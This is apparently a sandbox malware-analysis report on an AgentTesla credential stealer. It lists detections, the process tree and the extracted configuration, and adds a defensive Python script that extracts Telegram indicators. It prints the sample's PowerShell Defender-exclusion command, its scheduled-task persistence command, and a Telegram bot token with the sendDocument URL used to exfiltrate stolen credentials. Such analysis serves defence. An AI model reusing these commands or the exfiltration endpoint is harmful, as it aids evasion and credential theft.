
Windows Analysis Report
SecuriteInfo.com.W32.AIDetectNet.01.20229.6203

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetectNet.01.20229.6203 (renamed file extension from 6203 to exe)
Analysis ID:635380
MD5:adec785f7cbaa5af9c8c7fa50cf91baa
SHA1:d55fc2f774a1728526a753284e350aea08e3b17d
SHA256:fb6eb7efdf26e5f8eaab963dab6a7fb808724a4288d4df1fb8f146e13471e53d
Tags: AgentTesla, exe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.AIDetectNet.01.20229.exe (PID: 3984 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe" MD5: ADEC785F7CBAA5AF9C8C7FA50CF91BAA)
    • powershell.exe (PID: 6688 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6820 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Telegram RAT configuration: {"C2 url": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendMessage"}
AgentTesla configuration: {"Exfil Mode": "Telegram", "Chat id": "5365166645", "Chat URL": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument"}
Yara matches in memory dumps (Source | Rule | Description | Author, followed by matched strings):
0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  • 0x5180b:$s1: file:///
  • 0x5171b:$s2: {11111-22222-10009-11112}
  • 0x5179b:$s3: {11111-22222-50001-00000}
  • 0x4ec21:$s4: get_Module
  • 0x4f067:$s5: Reverse
  • 0x5104a:$s6: BlockCopy
  • 0x50e8e:$s7: ReadByte
  • 0x5181d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(19 entries in total; first 5 shown)
Yara matches in unpacked PEs (Source | Rule | Description | Author, followed by matched strings):
0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.raw.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  • 0x5180b:$s1: file:///
  • 0x5171b:$s2: {11111-22222-10009-11112}
  • 0x5179b:$s3: {11111-22222-50001-00000}
  • 0x4ec21:$s4: get_Module
  • 0x4f067:$s5: Reverse
  • 0x5104a:$s6: BlockCopy
  • 0x50e8e:$s7: ReadByte
  • 0x5181d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x32b38:$s10: logins
  • 0x325a5:$s11: credential
  • 0x2eb27:$g1: get_Clipboard
  • 0x2eb35:$g2: get_Keyboard
  • 0x2eb42:$g3: get_Password
  • 0x2fdf7:$g4: get_CtrlKeyDown
  • 0x2fe07:$g5: get_ShiftKeyDown
  • 0x2fe18:$g6: get_AltKeyDown
(41 entries in total; first 5 shown)
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5365166645", "Chat URL": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument"}
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.6956.15.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendMessage"}
Source: C:\Users\user\AppData\Roaming\HksvOcmoc.exe | ReversingLabs: Detection: 30%
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: PARAMD.pdb source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr
Source: Binary string: PARAMD.pdb8 source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da40272c67fce7
  Host: api.telegram.org
  Content-Length: 993
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528150791.00000000032E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.526308491.00000000010FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://uyaXTK.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528068312.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000003.379771521.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527999593.0000000003281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://VmuKuqO5f5glxfhci.org
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://VmuKuqO5f5glxfhci.org(t
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocumentdocument-----
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected:
  POST /bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da40272c67fce7
  Host: api.telegram.org
  Content-Length: 993
  Expect: 100-continue
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
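The bot token embedded in the URLs above is the most actionable indicator in this report: a Telegram-exfiltrating AgentTesla build carries `https://api.telegram.org/bot<id>:<secret>/` as a plain string, and the destination `chat_id` travels as a multipart form field inside the POST body (the report shows only the request headers; the 993-byte body is where the chat id and the stolen-credential document sit). The Python below is an added example, not code from the Joe Sandbox report or from any AgentTesla tooling: it pulls bot id, secret, API method names and chat ids out of a strings or memory-dump blob and renders a shareable, defanged IOC. The input blob is constructed from the URL strings listed above plus an invented multipart body; the token regex (numeric id, colon, 35-character secret) is an assumption based on the documented Telegram token format. The fontbureau, founder.com.cn, sakkal and similar URLs are font-metadata strings from embedded font resources, not network indicators, which is why the extractor only looks at api.telegram.org. Treat the recovered token as a live credential: anyone holding it can call the Bot API as the operator, so store it as a secret and do not probe it from attributable infrastructure.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Telegram bot tokens look like "<numeric bot id>:<35-char secret>" (assumption
# taken from the documented token format; widen {35} if a variant turns up).
TELEGRAM_URL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})"
    r"(?:/(?P<method>[A-Za-z]+))?"
)
# chat_id is submitted as a multipart/form-data field, not in the URL.
CHAT_ID_RE = re.compile(r'name="chat_id"\r?\n\r?\n(?P<chat_id>-?\d+)')
KNOWN_METHODS = ("sendDocument", "sendMessage", "getMe", "getUpdates")


@dataclass(frozen=True)
class TelegramC2:
    bot_id: str
    secret: str
    methods: tuple[str, ...]   # Bot API methods seen with this token
    chat_ids: tuple[str, ...]  # every chat_id form field found in the blob

    def defanged(self) -> str:
        """Shareable IOC: scheme and host defanged, secret truncated."""
        return (f"hxxps://api[.]telegram[.]org/bot{self.bot_id}:"
                f"{self.secret[:4]}...(redacted)")


def _canonical(method: str | None) -> str | None:
    """Map a method captured from a run-together memory string to a known name."""
    if not method:
        return None
    for name in KNOWN_METHODS:
        if method.startswith(name):
            return name
    return method


def extract_telegram_c2(blob: str) -> list[TelegramC2]:
    """Return one TelegramC2 per distinct bot id found in a strings/memory blob."""
    secrets: dict[str, str] = {}
    methods: defaultdict[str, set[str]] = defaultdict(set)
    for m in TELEGRAM_URL_RE.finditer(blob):
        secrets[m["bot_id"]] = m["secret"]
        if (name := _canonical(m["method"])):
            methods[m["bot_id"]].add(name)
    # chat ids cannot be tied to a token from strings alone, so they are blob-wide
    chat_ids = tuple(sorted({m["chat_id"] for m in CHAT_ID_RE.finditer(blob)}))
    return [TelegramC2(bid, sec, tuple(sorted(methods[bid])), chat_ids)
            for bid, sec in sorted(secrets.items())]


BOUNDARY = "---------------------------8da40272c67fce7"  # boundary from the report's POST
# Constructed input: the URL strings the report lists, plus an invented multipart
# body shaped like AgentTesla's sendDocument upload (the report shows only headers).
SAMPLE_BLOB = (
    "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/\n"
    "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument\n"
    "https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendMessage\n"
    "http://www.fontbureau.com/designers\n"  # font metadata noise, must be ignored
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="chat_id"\r\n\r\n5365166645\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="document"; filename="stolen.html"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n<html>...</html>\r\n"
    f"--{BOUNDARY}--\r\n"
)

if __name__ == "__main__":
    for c2 in extract_telegram_c2(SAMPLE_BLOB):
        print(c2.defanged(), c2.methods, c2.chat_ids)
```

Run it over `strings -el` output of the unpacked payload or over a PCAP's decrypted bodies; the `defanged()` form is what goes into a ticket or a sharing feed, while the raw secret stays in the case vault.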

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects zgRAT Author: ditekSHen
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
